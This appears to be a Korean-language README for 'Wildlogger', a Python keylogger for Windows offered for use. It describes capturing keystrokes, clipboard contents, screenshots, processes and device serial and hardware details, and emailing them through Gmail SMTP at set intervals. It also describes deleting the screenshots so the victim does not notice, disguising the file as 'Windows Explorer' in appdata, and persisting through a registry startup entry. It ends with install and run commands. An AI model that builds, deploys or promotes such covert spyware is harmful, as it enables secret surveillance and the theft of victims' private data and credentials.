
이것은 모든 데이터를 수집하고 설정된 시간마다 이메일로 전송하는 키로거로, 시스템 정보(기기 S/N 및 하드웨어 사양 포함), 눌린 모든 키, 스크린샷 및 복사 프로세스를 수집합니다.
__ ___ _ _ _
\ \ / (_) | | | | |
\ \ /\ / / _| | __| | | | ___ __ _ __ _ ___ _ __
\ \/ \/ / | | |/ _` | | | / _ \ / _` |/ _` |/ _ \ '__|
\ /\ / | | | (_| | | |___| (_) | (_| | (_| | __/ |
\/ \/ |_|_|\__,_| |______\___/ \__, |\__, |\___|_|
__/ | __/ |
|___/ |___/
Windows 운영 체제용 키로거로, 연결 정보, 장치 시스템 정보, 실행 중인 프로세스 목록 및 중지된 서비스, 키보드 입력, 클립보드 복사-붙여넣기 내용, 대상 시스템의 스크린샷을 캡처하여 지정된 시간 간격으로 지정된 이메일 주소로 전송합니다.
| :arrow_right: |
로그 기록과 스크린샷을 보고서로 보내기 위해 2개의 서로 다른 스레드가 사용됩니다.
:heavy_check_mark: 1번 스레드는 지정된 시간 간격에 따라 로그 기록을 지정된 이메일 주소로 전송합니다. :heavy_check_mark: 2번 스레드는 지정된 간격으로 스크린샷을 촬영합니다. 촬영된 스크린샷 수가 10개에 도달하면 스크린샷을 지정된 이메일 주소로 보고하고, 대상 컴퓨터에서 이상 징후를 탐지하지 않도록 삭제합니다. |
| :arrow_right: | 기본적으로 보고 작업에는 Google 메일 서버가 사용됩니다. |
| :arrow_right: | Gmail SMTP 서버를 사용하여 보고하는 경우, 덜 안전한 앱 액세스를 활성화해야 합니다. |
| :arrow_right: | Wildlogger가 대상 컴퓨터에서 계속 실행되도록 하는 지속성(persistent) 메서드는 기본적으로 비활성화되어 있습니다. |
| :arrow_right: |
Wildlogger를 exe로 변환할 때 대상 컴퓨터에서 계속 실행되도록 하려면 지속성(persistent) 메서드를 활성화해야 합니다. 지속성(persistent) 메서드가 활성화된 후:
:heavy_check_mark: 실행된 Wildlogger 파일은 "Windows Explorer"라는 이름으로 appdata 폴더에 복사됩니다. :heavy_check_mark: 레지스트리에서 키로거 파일의 경로를 Windows 시작 시 실행되는 응용 프로그램에 추가하여 지속성을 확보합니다. |
python -m pip install -r .\requirements.txt
python wildlogger.py